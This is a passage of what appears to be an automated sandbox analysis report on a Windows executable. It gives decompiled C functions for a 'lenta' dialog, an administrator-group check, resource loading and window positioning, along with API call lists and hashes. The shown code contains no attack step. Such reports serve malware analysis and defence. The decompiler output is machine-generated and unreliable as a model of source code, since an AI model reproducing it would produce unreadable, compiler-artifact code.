                            					L8:
                            					EndDialog(_a4, ??);
                            					L9:
                            					return 1;
                            				}
                            				_t15 = _t11 - 0x100;
                            				if(_t15 == 0) {
                            					_t16 = GetDesktopWindow();
                            					_t33 = _a4;
                            					E009443D0(_t33, _t16);
                            					SetDlgItemTextA(_t33, 0x834,  *0x948d4c);
                            					SetWindowTextA(_t33, "lenta");
                            					SetForegroundWindow(_t33);
                            					_t34 = GetDlgItem(_t33, 0x834);
                            					 *0x9488b8 = GetWindowLongA(_t34, 0xfffffffc);
                            					SetWindowLongA(_t34, 0xfffffffc, E009430C0);
                            					return 1;
                            				}
                            				if(_t15 != 1) {
                            					goto L13;
                            				}
                            				if(_a12 != 6) {
                            					if(_a12 != 7) {
                            						goto L9;
                            					}
                            					goto L7;
                            				}
                            				_push(1);
                            				goto L8;
                            			}









                            0x00943108
                            0x0094310b
                            0x009431b7
                            0x009431ca
                            0x009431d0
                            0x009431d0
                            0x009431da
                            0x00000000
                            0x009431da
                            0x00943111
                            0x00943114
                            0x00943136
                            0x00943136
                            0x00943138
                            0x0094313b
                            0x00943141
                            0x00000000
                            0x00943143
                            0x00943116
                            0x0094311b
                            0x0094314b
                            0x00943151
                            0x00943158
                            0x0094316a
                            0x00943176
                            0x0094317d
                            0x0094318b
                            0x0094319e
                            0x009431a3
                            0x00000000
                            0x009431ad
                            0x00943120
                            0x00000000
                            0x00000000
                            0x0094312a
                            0x00943134
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00943134
                            0x0094312c
                            0x00000000

                            APIs
                            • EndDialog.USER32(?,00000000), ref: 0094313B
                            • GetDesktopWindow.USER32 ref: 0094314B
                            • SetDlgItemTextA.USER32(?,00000834), ref: 0094316A
                            • SetWindowTextA.USER32(?,lenta), ref: 00943176
                            • SetForegroundWindow.USER32(?), ref: 0094317D
                            • GetDlgItem.USER32(?,00000834), ref: 00943185
                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00943190
                            • SetWindowLongA.USER32(00000000,000000FC,009430C0), ref: 009431A3
                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 009431CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                            • String ID: lenta
                            • API String ID: 3785188418-2780258678
                            • Opcode ID: fd79c3c324c563f8b47fd278fdd1d215afef49c7b67fbdd95ca8a1b3c662d543
                            • Instruction ID: ea82cef8971fe592a3aac0750ee533c88b6b6be25227e9bffd4bab887e12d665
                            • Opcode Fuzzy Hash: fd79c3c324c563f8b47fd278fdd1d215afef49c7b67fbdd95ca8a1b3c662d543
                            • Instruction Fuzzy Hash: 0311D3352AC261BBEB219F34AC0CF5F3A68FB5F724F108611F925911E0DBB49641E746
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E009418A3(void* __edx, void* __esi) {
                            				signed int _v8;
                            				short _v12;
                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                            				char _v20;
                            				long _v24;
                            				void* _v28;
                            				void* _v32;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t23;
                            				long _t45;
                            				void* _t49;
                            				int _t50;
                            				void* _t52;
                            				signed int _t53;
                            
                            				_t51 = __esi;
                            				_t49 = __edx;
                            				_t23 =  *0x948004; // 0xec518a5e
                            				_v8 = _t23 ^ _t53;
                            				_t25 =  *0x948128; // 0x2
                            				_t45 = 0;
                            				_v12 = 0x500;
                            				_t50 = 2;
                            				_v16.Value = 0;
                            				_v20 = 0;
                            				if(_t25 != _t50) {
                            					L20:
                            					return E00946CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                            				}
                            				if(E009417EE( &_v20) != 0) {
                            					_t25 = _v20;
                            					if(_v20 != 0) {
                            						 *0x948128 = 1;
                            					}
                            					goto L20;
                            				}
                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                            					goto L20;
                            				}
                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                            					L17:
                            					CloseHandle(_v28);
                            					_t25 = _v20;
                            					goto L20;
                            				} else {
                            					_push(__esi);
                            					_t52 = LocalAlloc(0, _v24);
                            					if(_t52 == 0) {
                            						L16:
                            						_pop(_t51);
                            						goto L17;
                            					}
                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                            						L15:
                            						LocalFree(_t52);
                            						goto L16;
                            					} else {
                            						if( *_t52 <= 0) {
                            							L14:
                            							FreeSid(_v32);
                            							goto L15;
                            						}
                            						_t15 = _t52 + 4; // 0x4
                            						_t50 = _t15;
                            						while(EqualSid( *_t50, _v32) == 0) {
                            							_t45 = _t45 + 1;
                            							_t50 = _t50 + 8;
                            							if(_t45 <  *_t52) {
                            								continue;
                            							}
                            							goto L14;
                            						}
                            						 *0x948128 = 1;
                            						_v20 = 1;
                            						goto L14;
                            					}
                            				}
                            			}


















                            0x009418a3
                            0x009418a3
                            0x009418ab
                            0x009418b2
                            0x009418b5
                            0x009418be
                            0x009418c0
                            0x009418c6
                            0x009418c7
                            0x009418ca
                            0x009418cf
                            0x009419c9
                            0x009419d8
                            0x009419d8
                            0x009418df
                            0x009419b8
                            0x009419bd
                            0x009419bf
                            0x009419bf
                            0x00000000
                            0x009419bd
                            0x009418fa
                            0x00000000
                            0x00000000
                            0x00941912
                            0x009419aa
                            0x009419ad
                            0x009419b3
                            0x00000000
                            0x00941927
                            0x00941927
                            0x00941932
                            0x00941936
                            0x009419a9
                            0x009419a9
                            0x00000000
                            0x009419a9
                            0x0094194c
                            0x009419a2
                            0x009419a3
                            0x00000000
                            0x0094196e
                            0x00941970
                            0x00941999
                            0x0094199c
                            0x00000000
                            0x0094199c
                            0x00941972
                            0x00941972
                            0x00941975
                            0x00941984
                            0x00941985
                            0x0094198a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094198c
                            0x00941991
                            0x00941996
                            0x00000000
                            0x00941996
                            0x0094194c

                            APIs
                              • Part of subcall function 009417EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009418DD), ref: 0094181A
                              • Part of subcall function 009417EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0094182C
                              • Part of subcall function 009417EE: AllocateAndInitializeSid.ADVAPI32(009418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009418DD), ref: 00941855
                              • Part of subcall function 009417EE: FreeSid.ADVAPI32(?,?,?,?,009418DD), ref: 00941883
                              • Part of subcall function 009417EE: FreeLibrary.KERNEL32(00000000,?,?,?,009418DD), ref: 0094188A
                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 009418EB
                            • OpenProcessToken.ADVAPI32(00000000), ref: 009418F2
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0094190A
                            • GetLastError.KERNEL32 ref: 00941918
                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 0094192C
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00941944
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00941964
                            • EqualSid.ADVAPI32(00000004,?), ref: 0094197A
                            • FreeSid.ADVAPI32(?), ref: 0094199C
                            • LocalFree.KERNEL32(00000000), ref: 009419A3
                            • CloseHandle.KERNEL32(?), ref: 009419AD
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                            • String ID:
                            • API String ID: 2168512254-0
                            • Opcode ID: 7b034dec88afbc5d2031382aecb6bb50b5d8563622b62dbfd464193e0cef3578
                            • Instruction ID: 08e95f2878479333d53b5b59cdc4903fd0546ed9e31e27dccf628088dcc7c6d7
                            • Opcode Fuzzy Hash: 7b034dec88afbc5d2031382aecb6bb50b5d8563622b62dbfd464193e0cef3578
                            • Instruction Fuzzy Hash: ED315E75A14209AFDB20DFA5EC98EBFBBBCFF0A344F100429E545E2150EB319945EB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E0094468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                            				long _t4;
                            				void* _t11;
                            				CHAR* _t14;
                            				void* _t15;
                            				long _t16;
                            
                            				_t14 = __ecx;
                            				_t11 = __edx;
                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                            				_t16 = _t4;
                            				if(_t16 <= _a4 && _t11 != 0) {
                            					if(_t16 == 0) {
                            						L5:
                            						return 0;
                            					}
                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                            					if(_t15 == 0) {
                            						goto L5;
                            					}
                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                            					FreeResource(_t15);
                            					return _t16;
                            				}
                            				return _t4;
                            			}








                            0x00944699
                            0x0094469b
                            0x009446a9
                            0x009446af
                            0x009446b4
                            0x009446bc
                            0x009446f9
                            0x00000000
                            0x009446f9
                            0x009446d9
                            0x009446dd
                            0x00000000
                            0x00000000
                            0x009446e5
                            0x009446ef
                            0x00000000
                            0x009446f5
                            0x009446ff

                            APIs
                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                            • SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                            • LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                            • LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                            • memcpy_s.MSVCRT ref: 009446E5
                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                            • String ID: TITLE$lenta
                            • API String ID: 3370778649-2035842925
                            • Opcode ID: ec366f152ebf8acf5460b8dcf36695224f8c72d2817b67ad4d898def2c481495
                            • Instruction ID: e57c1919d53aa582217134883b663e932b64a41793df7e5c195b59e35108780d
                            • Opcode Fuzzy Hash: ec366f152ebf8acf5460b8dcf36695224f8c72d2817b67ad4d898def2c481495
                            • Instruction Fuzzy Hash: 3301683A6983107BF3201BA56C4DF6B7F2CDBCBF62F054014FA4997191C9B18C41A6B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 57%
                            			E009417EE(intOrPtr* __ecx) {
                            				signed int _v8;
                            				short _v12;
                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                            				_Unknown_base(*)()* _v20;
                            				void* _v24;
                            				intOrPtr* _v28;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t14;
                            				_Unknown_base(*)()* _t20;
                            				long _t28;
                            				void* _t35;
                            				struct HINSTANCE__* _t36;
                            				signed int _t38;
                            				intOrPtr* _t39;
                            
                            				_t14 =  *0x948004; // 0xec518a5e
                            				_v8 = _t14 ^ _t38;
                            				_v12 = 0x500;
                            				_t37 = __ecx;
                            				_v16.Value = 0;
                            				_v28 = __ecx;
                            				_t28 = 0;
                            				_t36 = LoadLibraryA("advapi32.dll");
                            				if(_t36 != 0) {
                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                            					_v20 = _t20;
                            					if(_t20 != 0) {
                            						 *_t37 = 0;
                            						_t28 = 1;
                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                            							_t37 = _t39;
                            							 *0x94a288(0, _v24, _v28);
                            							_v20();
                            							if(_t39 != _t39) {
                            								asm("int 0x29");
                            							}
                            							FreeSid(_v24);
                            						}
                            					}
                            					FreeLibrary(_t36);
                            				}
                            				return E00946CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                            			}



















                            0x009417f6
                            0x009417fd
                            0x00941805
                            0x0094180b
                            0x0094180d
                            0x00941815
                            0x00941818
                            0x00941820
                            0x00941824
                            0x0094182c
                            0x00941832
                            0x00941837
                            0x00941851
                            0x00941854
                            0x0094185d
                            0x00941862
                            0x0094186c
                            0x00941872
                            0x00941877
                            0x0094187e
                            0x0094187e
                            0x00941883
                            0x00941883
                            0x0094185d
                            0x0094188a
                            0x0094188a
                            0x009418a2

                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009418DD), ref: 0094181A
                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0094182C
                            • AllocateAndInitializeSid.ADVAPI32(009418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009418DD), ref: 00941855
                            • FreeSid.ADVAPI32(?,?,?,?,009418DD), ref: 00941883
                            • FreeLibrary.KERNEL32(00000000,?,?,?,009418DD), ref: 0094188A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                            • String ID: CheckTokenMembership$advapi32.dll
                            • API String ID: 4204503880-1888249752
                            • Opcode ID: 2b3c04daec980ff2af8e1c69242e5b44c3128eed4e51485608fb8547a99343d6
                            • Instruction ID: 59806b4b2d020d0df3aab18b74c4c826a8cbc47efc2655dd4097e0d46eb90407
                            • Opcode Fuzzy Hash: 2b3c04daec980ff2af8e1c69242e5b44c3128eed4e51485608fb8547a99343d6
                            • Instruction Fuzzy Hash: 4D11B675E54209AFDB109FA4DC49EBEBB78EF4A701F10016AFA01E3390DB708D409B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00943450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                            				void* _t7;
                            				void* _t11;
                            				struct HWND__* _t12;
                            				int _t22;
                            				struct HWND__* _t24;
                            
                            				_t7 = _a8 - 0x10;
                            				if(_t7 == 0) {
                            					EndDialog(_a4, 2);
                            					L11:
                            					return 1;
                            				}
                            				_t11 = _t7 - 0x100;
                            				if(_t11 == 0) {
                            					_t12 = GetDesktopWindow();
                            					_t24 = _a4;
                            					E009443D0(_t24, _t12);
                            					SetWindowTextA(_t24, "lenta");
                            					SetDlgItemTextA(_t24, 0x838,  *0x949404);
                            					SetForegroundWindow(_t24);
                            					goto L11;
                            				}
                            				if(_t11 == 1) {
                            					_t22 = _a12;
                            					if(_t22 < 6) {
                            						goto L11;
                            					}
                            					if(_t22 <= 7) {
                            						L8:
                            						EndDialog(_a4, _t22);
                            						return 1;
                            					}
                            					if(_t22 != 0x839) {
                            						goto L11;
                            					}
                            					 *0x9491dc = 1;
                            					goto L8;
                            				}
                            				return 0;
                            			}








                            0x00943459
                            0x0094345c
                            0x009434d8
                            0x009434de
                            0x00000000
                            0x009434e0
                            0x0094345e
                            0x00943463
                            0x0094349a
                            0x009434a0
                            0x009434a7
                            0x009434b2
                            0x009434c4
                            0x009434cb
                            0x00000000
                            0x009434cb
                            0x00943468
                            0x0094346e
                            0x00943474
                            0x00000000
                            0x00000000
                            0x0094347c
                            0x0094348c
                            0x00943490
                            0x00000000
                            0x00943496
                            0x00943484
                            0x00000000
                            0x00000000
                            0x00943486
                            0x00000000
                            0x00943486
                            0x00000000

                            APIs
                            • EndDialog.USER32(?,?), ref: 00943490
                            • GetDesktopWindow.USER32 ref: 0094349A
                            • SetWindowTextA.USER32(?,lenta), ref: 009434B2
                            • SetDlgItemTextA.USER32(?,00000838), ref: 009434C4
                            • SetForegroundWindow.USER32(?), ref: 009434CB
                            • EndDialog.USER32(?,00000002), ref: 009434D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Window$DialogText$DesktopForegroundItem
                            • String ID: lenta
                            • API String ID: 852535152-2780258678
                            • Opcode ID: a722b7b2c1e0cb8d7fdbb8967766c81385f26c8d9f5d17e11527635300412725
                            • Instruction ID: 57e1be61c6ce71483f07cbc2d1b967ce3afb4177473f9639d96561c5adb7d921
                            • Opcode Fuzzy Hash: a722b7b2c1e0cb8d7fdbb8967766c81385f26c8d9f5d17e11527635300412725
                            • Instruction Fuzzy Hash: A601D4352B8124ABD71A5F75DC0CDEE3B68EB4A710F00C410F946869B0CB749F41EB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E00942AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t16;
                            				int _t21;
                            				char _t32;
                            				intOrPtr _t34;
                            				char* _t38;
                            				char _t42;
                            				char* _t44;
                            				CHAR* _t52;
                            				intOrPtr* _t55;
                            				CHAR* _t59;
                            				void* _t62;
                            				CHAR* _t64;
                            				CHAR* _t65;
                            				signed int _t66;
                            
                            				_t60 = __edx;
                            				_t16 =  *0x948004; // 0xec518a5e
                            				_t17 = _t16 ^ _t66;
                            				_v8 = _t16 ^ _t66;
                            				_t65 = _a4;
                            				_t44 = __edx;
                            				_t64 = __ecx;
                            				if( *((char*)(__ecx)) != 0) {
                            					GetModuleFileNameA( *0x949a3c,  &_v268, 0x104);
                            					while(1) {
                            						_t17 =  *_t64;
                            						if(_t17 == 0) {
                            							break;
                            						}
                            						_t21 = IsDBCSLeadByte(_t17);
                            						 *_t65 =  *_t64;
                            						if(_t21 != 0) {
                            							_t65[1] = _t64[1];
                            						}
                            						if( *_t64 != 0x23) {
                            							L19:
                            							_t65 = CharNextA(_t65);
                            						} else {
                            							_t64 = CharNextA(_t64);
                            							if(CharUpperA( *_t64) != 0x44) {
                            								if(CharUpperA( *_t64) != 0x45) {
                            									if( *_t64 == 0x23) {
                            										goto L19;
                            									}
                            								} else {
                            									E00941680(_t65, E009417C8(_t44, _t65),  &_v268);
                            									_t52 = _t65;
                            									_t14 =  &(_t52[1]); // 0x2
                            									_t60 = _t14;
                            									do {
                            										_t32 =  *_t52;
                            										_t52 =  &(_t52[1]);
                            									} while (_t32 != 0);
                            									goto L17;
                            								}
                            							} else {
                            								E009465E8( &_v268);
                            								_t55 =  &_v268;
                            								_t62 = _t55 + 1;
                            								do {
                            									_t34 =  *_t55;
                            									_t55 = _t55 + 1;
                            								} while (_t34 != 0);
                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                            									 *_t38 = 0;
                            								}
                            								E00941680(_t65, E009417C8(_t44, _t65),  &_v268);
                            								_t59 = _t65;
                            								_t12 =  &(_t59[1]); // 0x2
                            								_t60 = _t12;
                            								do {
                            									_t42 =  *_t59;
                            									_t59 =  &(_t59[1]);
                            								} while (_t42 != 0);
                            								L17:
                            								_t65 =  &(_t65[_t52 - _t60]);
                            							}
                            						}
                            						_t64 = CharNextA(_t64);
                            					}
                            					 *_t65 = _t17;
                            				}
                            				return E00946CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                            			}






















                            0x00942aac
                            0x00942ab7
                            0x00942abc
                            0x00942abe
                            0x00942ac3
                            0x00942ac6
                            0x00942ac9
                            0x00942ace
                            0x00942ae6
                            0x00942bdc
                            0x00942bdc
                            0x00942be0
                            0x00000000
                            0x00000000
                            0x00942af2
                            0x00942afc
                            0x00942b00
                            0x00942b05
                            0x00942b05
                            0x00942b0b
                            0x00942bca
                            0x00942bd1
                            0x00942b11
                            0x00942b18
                            0x00942b26
                            0x00942b99
                            0x00942bc8
                            0x00000000
                            0x00000000
                            0x00942b9b
                            0x00942bae
                            0x00942bb3
                            0x00942bb5
                            0x00942bb5
                            0x00942bb8
                            0x00942bb8
                            0x00942bba
                            0x00942bbb
                            0x00000000
                            0x00942bb8
                            0x00942b28
                            0x00942b2e
                            0x00942b33
                            0x00942b39
                            0x00942b3c
                            0x00942b3c
                            0x00942b3e
                            0x00942b3f
                            0x00942b55
                            0x00942b5d
                            0x00942b64
                            0x00942b64
                            0x00942b7a
                            0x00942b7f
                            0x00942b81
                            0x00942b81
                            0x00942b84
                            0x00942b84
                            0x00942b86
                            0x00942b87
                            0x00942bbf
                            0x00942bc1
                            0x00942bc1
                            0x00942b26
                            0x00942bda
                            0x00942bda
                            0x00942be6
                            0x00942be6
                            0x00942bf8

                            APIs
                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00942AE6
                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00942AF2
                            • CharNextA.USER32(?), ref: 00942B12
                            • CharUpperA.USER32 ref: 00942B1E
                            • CharPrevA.USER32(?,?), ref: 00942B55
                            • CharNextA.USER32(?), ref: 00942BD4
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                            • String ID:
                            • API String ID: 571164536-0
                            • Opcode ID: 1ace1fb58a4e3ee864db490ad477ba04a55435b0949396de2a6d4848199c32fe
                            • Instruction ID: eea9c2df894aab33958398aebb8a5566e07f683359d22cae5b05bdced7a3aa9c
                            • Opcode Fuzzy Hash: 1ace1fb58a4e3ee864db490ad477ba04a55435b0949396de2a6d4848199c32fe
                            • Instruction Fuzzy Hash: 5A4103385182855EDB159F349C54EFE7BADEF97300F54009AE8C287202DB358E86DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E009443D0(struct HWND__* __ecx, struct HWND__* __edx) {
                            				signed int _v8;
                            				struct tagRECT _v24;
                            				struct tagRECT _v40;
                            				struct HWND__* _v44;
                            				intOrPtr _v48;
                            				int _v52;
                            				intOrPtr _v56;
                            				int _v60;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t29;
                            				void* _t53;
                            				intOrPtr _t56;
                            				int _t59;
                            				struct HWND__* _t63;
                            				struct HWND__* _t67;
                            				struct HWND__* _t68;
                            				struct HDC__* _t69;
                            				int _t72;
                            				signed int _t74;
                            
                            				_t63 = __edx;
                            				_t29 =  *0x948004; // 0xec518a5e
                            				_v8 = _t29 ^ _t74;
                            				_t68 = __edx;
                            				_v44 = __ecx;
                            				GetWindowRect(__ecx,  &_v40);
                            				_t53 = _v40.bottom - _v40.top;
                            				_v48 = _v40.right - _v40.left;
                            				GetWindowRect(_t68,  &_v24);
                            				_v56 = _v24.bottom - _v24.top;
                            				_t69 = GetDC(_v44);
                            				_v52 = GetDeviceCaps(_t69, 8);
                            				_v60 = GetDeviceCaps(_t69, 0xa);
                            				ReleaseDC(_v44, _t69);
                            				_t56 = _v48;
                            				asm("cdq");
                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                            				_t67 = 0;
                            				if(_t72 >= 0) {
                            					_t63 = _v52;
                            					if(_t72 + _t56 > _t63) {
                            						_t72 = _t63 - _t56;
                            					}
                            				} else {
                            					_t72 = _t67;
                            				}
                            				asm("cdq");
                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                            				if(_t59 >= 0) {
                            					_t63 = _v60;
                            					if(_t59 + _t53 > _t63) {
                            						_t59 = _t63 - _t53;
                            					}
                            				} else {
                            					_t59 = _t67;
                            				}
                            				return E00946CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                            			}
























                            0x009443d0
                            0x009443d8
                            0x009443df
                            0x009443e6
                            0x009443ec
                            0x009443f1
                            0x00944400
                            0x00944403
                            0x0094440b
                            0x00944420
                            0x00944429
                            0x00944437
                            0x00944444
                            0x00944447
                            0x0094444d
                            0x00944454
                            0x0094445b
                            0x00944460
                            0x00944461
                            0x00944467
                            0x0094446f
                            0x00944473
                            0x00944473
                            0x00944463
                            0x00944463
                            0x00944463
                            0x0094447a
                            0x00944481
                            0x00944484
                            0x0094448a
                            0x00944492
                            0x00944496
                            0x00944496
                            0x00944486
                            0x00944486
                            0x00944486
                            0x009444b8

                            APIs
                            • GetWindowRect.USER32(?,?), ref: 009443F1
                            • GetWindowRect.USER32(00000000,?), ref: 0094440B
                            • GetDC.USER32(?), ref: 00944423
                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0094442E
                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0094443A
                            • ReleaseDC.USER32(?,00000000), ref: 00944447
                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 009444A2
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Window$CapsDeviceRect$Release
                            • String ID:
                            • API String ID: 2212493051-0
                            • Opcode ID: bc796336698a101cdd146ceee85120c3dcd031c1fd7895a795f63d70c9afb01d
                            • Instruction ID: c46bb4747c659fc3e151b5b8bb745e97173bf3a79ca5397e3f71c9461e224b97
                            • Opcode Fuzzy Hash: bc796336698a101cdd146ceee85120c3dcd031c1fd7895a795f63d70c9afb01d
